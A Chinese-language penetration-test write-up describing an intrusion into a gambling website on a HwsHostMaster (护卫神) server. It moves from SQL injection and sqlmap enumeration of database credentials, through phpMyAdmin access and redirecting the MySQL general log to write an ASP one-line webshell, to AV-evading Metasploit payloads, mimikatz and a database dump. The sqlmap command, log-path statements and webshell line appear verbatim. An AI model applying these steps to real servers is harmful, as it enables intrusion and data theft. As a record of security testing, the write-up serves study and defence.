记一次菠菜站对护卫神的利用

因为这个站是几个月前日的了，所以图片可能不全，也没办法再补图。

写这篇文章的时候，隔壁情侣正在鼓掌，声音贼响，导致我写的东西可能没有过一遍脑子，写的可能有点混乱。另外值得一提的是，为啥我们做安全的经常隔壁碰到这种人？

已知目标网站

之前客户有给过这种网站，所以我记忆尤深，针对这种站一般你可以直接放弃正常测试流程了，因为经验告诉我，网站主站功能基本上很少有漏洞的，只能从旁站下手。

Ctrl+u查看一波没发现有什么存在泄漏的js，回过头发现发现网站右上角有个优惠活动大厅

打开后页面似曾相识

随便点开一个活动，好像可以随便提交文字，没有过滤，我信心满满输入xss，提交，然而两天过去了，并没什么叼用，我当时的心情真是像云像雾又像雨。

然而我又发现下面有个审核进度查询，打开后会让你输入用户名，既然有输入用户名，那应该就是有带入数据库查询，习惯性加了个’点击查询，10秒过去了，没响应，我懵了，输入正常不存在的账号测试，是会弹出记录的，但是加单引号查询却一点响应都没有。

F12-network抓包，发现是有发送请求的，很明显了，有注入，而且报错是页面是thinkphp，从最下角看版本是3.2.3，这个版本真的是hc的最爱，从色情到贷款平台，再到菠菜都是这个版本的thinkphp。

先注入一波试试

抓包Sqlmap一波拿到了管理员账号密码，突然我意识到，我没有后台地址，拿到了也没叼用。

Fofa一波得到真实ip，发现999端口存在phpmyadmin服务，6588有一个标题为护卫神丶主机大师的asp站。目录爆破，端口扫描，子域名挖掘，都没有找到后台地址。

Os-shell成功，但是不管我输入什么都没反应。

Sql-shell也一样，仔细观察发现，网站路径是装在护卫神的。

有可能是护卫神拦截了，当时我还疑惑，这php的站，你用护卫神是什么意思。

等到十分钟后百度了一下hwshostmaster，我才知道我是多么无知，原来护卫神不是光有waf，他还有一个叫主机大师的服务，大概功能与phpstudy相同。

本地安装观察，发现主机大师默认安装后会在999端口启动phpmyadmin，6588端口则启动主机大师默认的管理页面，与我观察的目标ip端口一致。

既然目标站有phpmyadmin，那我就可以尝试使用sqlmap枚举一下对方数据库账号与密码hash。

Sqlmap –r sql.txt --string="Surname" --users --password

Sqlmap枚举出来了root与test，root的密码没有破解出来，但是test的密码破解出来为1234。登陆成功。

关于这种情况拿shell，木神的黑白天公众号里有篇文章<phpMyAdmin 渗透利用总结

>已经写的很详细了，木神看到这篇文章麻烦找我结一下广告费。

mysql数据库getshell一般有两种方法，into outfile，导出日志。

根据注入报错页面的文件地址

构造语句

select 1 into outfile 'D:/wwwroot/xxx.com/web/1.txt'

报错#1 - Can't create/write to file，应该是没有权限

尝试使用日志写入，先开启日志，然后

set global  general_log_file =" D:\\wwwroot\\xxx.com\\web\\a.php"

好像还是不行，我裂开了。

突然我想到，既然这个wwwroot目录没有权限，那么护卫神主机大师管理页面是否可以利用一下呢 ，翻了一下本地安装的主机大师文件，可以确认主机大师的管理页面绝对路径是D:\Hws.com\HwsHostMaster\host\web

尝试修改日志

Set global  general_log_file =" D:\\Hws.com\\HwsHostMaster\\host\\web\\1.asp"

成功。

然后执行

select “<%eval request("chopper")%>”

访问http://xxx.xxx.xxx.xxx:6588/1.asp报错404，这个问题难了我好久，后来我才发现，需要把日志文件换成其他的，当前日志文件才可以访问。

Cknife连接成功

Whoami发现是system权限，那么剩下的就简单了，为了防止护卫神查杀，生成了个msf免杀马，通过certutil下载，然后执行，msf上线，然后迁移进程，load mimikatz，一套下来拿到了远程账号密码，脱裤打包源码，提交给客户，完事。

END